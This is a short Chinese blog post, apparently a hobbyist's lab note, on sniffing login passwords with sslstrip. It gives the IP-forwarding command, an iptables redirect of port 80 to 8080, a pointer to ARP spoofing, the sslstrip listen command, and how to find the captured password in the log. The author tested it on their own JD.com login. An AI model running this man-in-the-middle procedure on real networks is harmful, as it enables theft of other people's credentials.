美文网首页
利用sslstrip嗅探http密码

利用sslstrip嗅探http密码

作者: Fisheepnix | 来源:发表于2018-02-17 00:06 被阅读0次

    具体操作的截图我只截了几张,因为弄过很多次了,所以就不再重复了

    1. echo 1 >/proc/sys/net/ipv4/ip_forward

    (这条命令的意思我百度了一下好像是开启ip转发功能)

    2. 配置路由表,把80端口的数据传送到8080端口,也就是SSL欺骗需要监听的端口

    具体指令:iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080(这个我背不到,一直都是复制的)

    3. 开始arp欺骗

    具体指令见  使用arp欺骗造成目标断网  那一节截取图片

    4. 开始监听:sslstrip -l 8080

    当时这步是成功了的,我也用的京东当例子,https变成了http

    5. 在浏览器内登录账号以及密码

    这个也没截图,只有最后的几张截图(忘了)

    6. 打开终端输入:cat sslstrip.log

    然后就出来

    这么大一堆。。。

    艰难的定位到了我账号的地方,有两个。。

    前面那个后面没有东西,所以应该是第二个的位置,这个后面是loginpwd,所以应该是没错

    (其实这应该是一节疑问大全。。。。)

    相关文章

      网友评论

          本文标题:利用sslstrip嗅探http密码

          本文链接:https://www.haomeiwen.com/subject/socmtftx.html